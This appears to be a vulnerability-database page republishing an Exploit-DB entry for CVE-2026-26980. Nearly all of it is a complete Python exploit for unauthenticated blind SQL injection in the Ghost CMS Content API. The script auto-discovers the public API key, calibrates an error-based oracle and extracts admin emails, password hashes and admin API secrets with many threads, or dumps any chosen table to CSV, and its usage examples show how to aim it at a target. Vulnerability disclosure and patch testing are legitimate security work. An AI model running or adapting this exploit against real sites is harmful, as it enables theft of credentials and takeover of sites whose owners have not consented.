Lucene search
K

Ghost CMS 6.19.0 - SQLi

🗓️ 07 May 2026 00:00:00Reported by Maksim RogovType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 42 Views

Ghost CMS versions 3.24.0 to 6.19.0 have a SQL injection flaw CVE-2026-26980.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for SQL Injection in Ghost
29 May 202604:16
githubexploit
GithubExploit
Exploit for SQL Injection in Ghost
17 Apr 202619:15
githubexploit
GithubExploit
Exploit for SQL Injection in Ghost
29 Mar 202622:00
githubexploit
ATTACKERKB
CVE-2026-26980
20 Feb 202601:00
attackerkb
Circl
CVE-2026-26980
20 Feb 202602:18
circl
CNNVD
Ghost SQL注入漏洞
20 Feb 202600:00
cnnvd
CVE
CVE-2026-26980
20 Feb 202601:00
cve
Cvelist
CVE-2026-26980 Ghost has a SQL Injection in its Content API
20 Feb 202601:00
cvelist
Github Security Blog
Ghost has a SQL injection in Content API
18 Feb 202621:50
github
Malwarebytes
700+ education and tech websites hijacked in huge ClickFix malware campaign
26 May 202610:46
malwarebytes
Rows per page
# Exploit Title: Ghost CMS 6.19.0 - SQLi
# Date: 2026-03-30
# Exploit Author: Maksim Rogov
# Exploit Licence: GPL-3.0
# Software Link: https://ghost.org/
# Version: Ghost >=3D 3.24.0, <=3D 6.19.0
# Tested on: Ghost 6.16.1
# CVE : CVE-2026-26980

# Exploit Title: Ghost CMS Unauthenticated SQLi via Content API
# Exploit Author: vognik
# Software Link: https://ghost.org/
# Version: Ghost >= 3.24.0, <= 6.19.0
# Tested on: Ghost 6.16.1
# CVE : CVE-2026-26980

#!/usr/bin/env python3

import requests
import re
import sys
import argparse
import textwrap
import csv
from typing import Optional
from concurrent.futures import ThreadPoolExecutor
from urllib.parse import urljoin, urlparse

CHARSET = "".join(sorted(set("$./0123456789:ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz@!#%^&*()+-=")))
ERROR_INDICATOR = "InternalServerError"
DEFAULT_API_PATH = "/ghost/api/content/"
DEFAULT_THREADS = 15

class GhostExploit:
    def __init__(self, target_url: str, threads: int = DEFAULT_THREADS, dbms: str = "sqlite", output: str = None, user_cols: str = None, verify: bool = True, manual_key: str = None, manual_path: str = None):
        self.target = target_url.rstrip('/')
        self.threads = threads
        self.dbms = dbms.lower()
        self.output = output
        self.user_cols = [c.strip() for c in user_cols.split(',')] if user_cols else None
        self.session = requests.Session()
        self.session.verify = verify
        self.manual_key = manual_key
        self.manual_path = manual_path
        if not verify:
            import urllib3
            urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
        self.api_key, self.endpoint, self.tag_slug, self.tag_id, self.url_template = "", "", "", "", ""

    def to_char_hex(self, s: str):
        if self.dbms == "mysql":
            return "0x" + "".join([f"{ord(c):02x}" for c in s])
        return "||".join([f"char({ord(c)})" for c in s])

    def _get_metadata_from_page(self) -> tuple[Optional[str], Optional[str]]:
        try:
            r = self.session.get(self.target, timeout=10)
            r.raise_for_status()
            
            key = re.search(r'data-key="([a-f0-9]+)"', r.text)
            api = re.search(r'data-api="([^"]+)"', r.text)
            
            found_key = key.group(1) if key else None
            found_path = urlparse(api.group(1)).path if api else None
            return found_key, found_path
        except Exception:
            return None, None

    def discover(self) -> bool:
        found_key, found_path = None, None

        if not self.manual_key or not self.manual_path:
            found_key, found_path = self._get_metadata_from_page()

        self.api_key = self.manual_key or found_key
        final_path = self.manual_path or found_path or DEFAULT_API_PATH

        if not self.api_key:
            return False

        self.endpoint = urljoin(self.target, final_path).rstrip('/') + '/'

        try:
            test_url = f"{self.endpoint}tags/"
            r = self.session.get(test_url, params={'key': self.api_key}, timeout=10)
            r.raise_for_status()

            json_data = r.json()
            if 'tags' in json_data and json_data['tags']:
                tag = json_data['tags'][0]
                self.tag_slug, self.tag_id = tag['slug'], tag['id']
                self.url_template = (
                    f"{self.endpoint}tags/?key={self.api_key}"
                    f"&filter=slug:['*',{self.tag_slug}]&limit=all"
                )
                return True
        except Exception:
            pass

        return False

    def check(self, cond: str) -> bool:
        if self.dbms == "mysql":
            err_payload = "(SELECT exp(710))"
        else:
            err_payload = "(SELECT abs(-9223372036854775808))"

        payload = f" OR ({cond}) THEN {err_payload} WHEN slug="
        try:
            r = self.session.get(self.url_template.replace("*", payload, 1), timeout=7)
            return ERROR_INDICATOR.lower() in r.text.lower()
        except Exception:
            return False

    def get_len(self, query: str) -> int:
        length = 0
        for bit in [64, 32, 16, 8, 4, 2, 1]:
            if self.check(f"LENGTH(({query}))>={length + bit}"): 
                length += bit
        return length

    def get_char(self, query: str, pos: int) -> str:
        low, high = 0, len(CHARSET) - 1
        while low < high:
            mid = (low + high) // 2
            char_code = ord(CHARSET[mid + 1])
            
            if self.dbms == "mysql":
                cond = f"ASCII(SUBSTR(({query}) FROM {pos} FOR 1))>={char_code}"
            else:
                prefix = "||".join(["char(63)"] * (pos - 1))
                c_range = f"char(91)||char({char_code})||char(45)||char({ord(CHARSET[-1])})||char(93)"
                cond = f"({query}) GLOB {prefix}||{c_range}||char(42)" if prefix else f"({query}) GLOB {c_range}||char(42)"

            if self.check(cond): 
                low = mid + 1
            else: 
                high = mid
        return CHARSET[low]

    def extract(self, query: str, label: str, force_len: int = None) -> str:
        length = force_len if force_len is not None else self.get_len(query)
        if length <= 0:
            return ""
        
        chars = [""] * length
        with ThreadPoolExecutor(max_workers=self.threads) as ex:
            futures = {ex.submit(self.get_char, query, i+1): i for i in range(length)}
            for f in futures:
                chars[futures[f]] = f.result()
                sys.stdout.write(f"\r  {label} ({length} chars): {''.join(c if c else '.' for c in chars)}")
                sys.stdout.flush()
        res = "".join(chars)
        sys.stdout.write(f"\r  {label} ({length} chars): {res}\n")
        return res

    def print_table(self, columns, rows):
        if not rows:
            return
        widths = {col: len(col) for col in columns}
        for row in rows:
            for col in columns:
                widths[col] = max(widths[col], len(str(row.get(col, ""))))

        sep = "+" + "+".join(["-" * (widths[col] + 2) for col in columns]) + "+"
        head = "|" + "|".join([f" {col.ljust(widths[col])} " for col in columns]) + "|"
        
        print("\n" + sep)
        print(head)
        print(sep)
        for row in rows:
            line = "|" + "|".join([f" {str(row.get(col, '')).ljust(widths[col])} " for col in columns]) + "|"
            print(line)
        print(sep + "\n")

    def dump_table(self, table_name: str):
        print(f"\n[*] Dumping table: {table_name}")
        cast_type = "CHAR" if self.dbms == "mysql" else "TEXT"
        
        count_str = self.extract(f"SELECT CAST(COUNT(*) AS {cast_type}) FROM {table_name}", "Total records")
        count = int(count_str) if count_str.isdigit() else 0
        if count == 0: 
            print("[!] No records found or table doesn't exist.")
            return

        if self.user_cols:
            columns = self.user_cols
            print(f"[*] Using user-defined columns: {', '.join(columns)}")
        elif self.dbms == "sqlite":
            t_name_char = self.to_char_hex(table_name)
            schema_query = f"SELECT sql FROM sqlite_master WHERE name={t_name_char}"
            cols_raw = self.extract(schema_query, "Schema")
            columns = re.findall(r'([a-zA-Z_]+)\s+(?:TEXT|VARCHAR|INT|DATETIME|TIMESTAMP|BOOLEAN)', cols_raw, re.I)
        else:
            columns = ['id', 'email', 'name', 'password', 'status']

        if not columns:
            columns = ['id', 'email']
        
        all_rows = []
        for i in range(count):
            print(f"\n  --- Record #{i+1} ---")
            current_row = {}
            for col in columns:
                val = self.extract(f"SELECT {col} FROM {table_name} LIMIT 1 OFFSET {i}", col)
                current_row[col] = val
            all_rows.append(current_row)
        
        self.print_table(columns, all_rows)

        if self.output:
            try:
                with open(self.output, 'w', newline='', encoding='utf-8') as f:
                    writer = csv.DictWriter(f, fieldnames=columns)
                    writer.writeheader()
                    writer.writerows(all_rows)
                print(f"[+] Exported to {self.output}")
            except Exception as e:
                print(f"[!] Export error: {e}")

    def run_passive_check(self):
        print(f"[*] Passive check for: {self.target}")
        try:
            r = self.session.get(self.target, timeout=10)
            m = re.search(r'<meta name="generator" content="Ghost\s+([\d\.]+)', r.text)
            if m:
                ver_str = m.group(1)
                v = [int(x) for x in ver_str.split('.') if x.isdigit()]
                
                major = v[0] if len(v) > 0 else 0
                minor = v[1] if len(v) > 1 else 0
                
                is_v = (major == 3 and minor >= 24) or (4 <= major <= 5) or (major == 6 and minor <= 19)
                status = "appears to be vulnerable" if is_v else "is not vulnerable"
                print(f"[+] Passive result: version {ver_str} {status}")
            else:
                print("[-] Meta generator tag not found. Passive check failed.")
        except Exception as e:
            print(f"[!] Error during passive check: {e}")

    def run_default_flow(self):
        LIMIT = "LIMIT 1"
        ORDER_BY_CREATED_ASC = "ORDER BY id ASC"
        adm_type = self.to_char_hex("admin")
        cast_t = "CHAR" if self.dbms == "mysql" else "TEXT"

        print("\n[*] Phase 1: Recon (fast checks)")
        l_email = self.get_len(f"SELECT email FROM users {ORDER_BY_CREATED_ASC} {LIMIT}")
        print(f"  length(users.email) = {l_email}")
        l_pass = self.get_len(f"SELECT password FROM users {ORDER_BY_CREATED_ASC} {LIMIT}")
        print(f"  length(users.password) = {l_pass}")
        l_name = self.get_len(f"SELECT name FROM users {ORDER_BY_CREATED_ASC} {LIMIT}")
        print(f"  length(users.name) = {l_name}")
        l_status = self.get_len(f"SELECT status FROM users {ORDER_BY_CREATED_ASC} {LIMIT}")
        print(f"  length(users.status) = {l_status}")

        for t in ["users", "members", "api_keys", "sessions"]:
            self.extract(f"SELECT CAST(COUNT(*) AS {cast_t}) FROM {t}", f"count({t})")

        print("\n[*] Phase 2: Extracting values")

        self.extract(f"SELECT email FROM users {ORDER_BY_CREATED_ASC} {LIMIT}", "Admin email", l_email)
        self.extract(f"SELECT name FROM users {ORDER_BY_CREATED_ASC} {LIMIT}", "Admin name", l_name)

        self.extract(f"SELECT id FROM api_keys WHERE type={adm_type} AND user_id IS NOT NULL {ORDER_BY_CREATED_ASC} {LIMIT}", "Admin API key ID")
        self.extract(f"SELECT secret FROM api_keys WHERE type={adm_type} AND user_id IS NOT NULL {ORDER_BY_CREATED_ASC} {LIMIT}", "Admin API secret")
        self.extract(f"SELECT password FROM users {ORDER_BY_CREATED_ASC} {LIMIT}", "Password hash", l_pass)

    def print_banner(self):
        print("================================================================")
        print("Ghost CMS - Unauthenticated SQLi Data Extraction")
        print(f"Target:   {self.target}")
        print(f"API Key:  {self.api_key}")
        print(f"Tag ID:   {self.tag_id}")
        print("Endpoint: Content API (public, no auth)")
        print("================================================================")

    def run(self, table_to_dump: Optional[str] = None, check_mode: Optional[str] = None):
        if check_mode == "passive": 
            return self.run_passive_check()

        if not self.discover():
            print("[!] Discovery failed. Could not find API Key or Endpoint.")
            return

        if check_mode == "active":
            print(f"[*] Active check for: {self.target}")
            is_v = self.check("1=1")
            status = "vulnerable" if is_v else "not vulnerable"
            print(f"[*] Active check: the target is {status}.")
            return

        self.print_banner()

        if not self.check("1=1"):
            print("\n[*] Calibrating oracle...")
            print("[!] Oracle calibration failed. Target might be patched or DBMS is wrong.")
            return
        else:
            print("\n[*] Calibrating oracle... OK")

        if table_to_dump:
            self.dump_table(table_to_dump)
        else:
            self.run_default_flow()

if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        formatter_class=argparse.RawDescriptionHelpFormatter, 
        epilog=textwrap.dedent("""
            Usage examples:
            python3 main.py -u http://target.com
            (Quickly extract admin email and password hash from a default SQLite setup)

            python3 main.py -u http://target.com -c passive
            (Check the site for the vulnerability using the meta tag on the main page)

            python3 main.py -u http://target.com -d mysql -T users -C email,password -o ./result.csv
            (Dump the "email" and "password" columns from the "users" table and save the result to "result.csv")

            python3 main.py -u http://target.com -d mysql -T api_keys -t 25
            (Dump all API keys from the "api_keys" table using 25 threads)

            Note: Most production Ghost instances use MySQL. Local/Small blogs use SQLite.
        """)
    )

    group_conn = parser.add_argument_group("Connection settings")
    group_conn.add_argument("-u", "--url", required=True, metavar="URL", 
                            help="Set target Ghost instance URL")
    group_conn.add_argument("-a", "--api-key", metavar="KEY", 
                            help="Set Content API key (skips auto-discovery)")
    group_conn.add_argument("-p", "--api-path", metavar="PATH", default=None,
                            help="Set Content API path (default: %(default)s)")
    group_conn.add_argument("-k", "--insecure", action="store_true", 
                            help="Skip SSL certificate verification")

    group_extr = parser.add_argument_group("Extraction settings")
    group_extr.add_argument("-c", "--check", metavar="MODE", choices=["passive", "active"], 
                            help="Verify vulnerability: passive (meta tags) or active (SQL error)")
    group_extr.add_argument("-d", "--dbms", default="sqlite", choices=["sqlite", "mysql"], 
                            help="Select database engine (default: %(default)s)")
    group_extr.add_argument("-T", "--table", metavar="NAME", 
                            help="Set database table to dump (e.g., users, api_keys)")
    group_extr.add_argument("-C", "--columns", metavar="COL1,COL2", 
                            help="Set columns to extract (comma-separated)")
    group_extr.add_argument("-t", "--threads", type=int, default=DEFAULT_THREADS, metavar="N", 
                            help="Set number of concurrent threads (default: %(default)s)")

    group_out = parser.add_argument_group("Output settings")
    group_out.add_argument("-o", "--output", metavar="FILE", 
                        help="Save results to the specified CSV file")
    args = parser.parse_args()
    
    try:
        exploit = GhostExploit(args.url, args.threads, args.dbms, args.output, args.columns, not args.insecure, args.api_key, args.api_path)
        exploit.run(args.table, args.check)
    except KeyboardInterrupt:
        print("\n[!] Aborted")

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 May 2026 00:00Current
6Medium risk
Vulners AI Score6
CVSS 3.17.5 - 9.4
EPSS0.56657
SSVC
42